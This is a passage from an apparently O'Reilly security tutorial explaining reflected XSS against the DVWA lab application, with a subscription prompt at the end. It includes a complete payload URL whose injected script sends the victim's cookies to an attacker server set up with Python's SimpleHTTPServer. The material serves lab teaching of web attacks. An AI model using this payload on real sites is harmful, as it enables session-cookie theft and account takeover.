How it works...
In attacks such as XSS, where user interaction is required in order to exploit a vulnerability, attackers have little or no control over when the user clicks the malicious link or performs the action required to compromise the application. In such a scenario, the attacker should have a server set up to receive the information sent by the victim.
In this example, we used the SimpleHTTPServer module provided by Python, but a more sophisticated attack would obviously require a more sophisticated server.
After that, going to DVWA and entering the payload in the Name textbox simulates a user clicking on a link to http://192.168.56.11/dvwa/vulnerabilities/xss_r/?name=Bob<script>document.write('<img src="http://192.168.56.10:88/'+document.cookie+'">');</script> ...
Become an O’Reilly member and get unlimited access to this title plus top books and audiobooks from O’Reilly and nearly 200 top publishers, thousands of courses curated by job role, 150+ live events each month,
and much more.
Read now
Unlock full access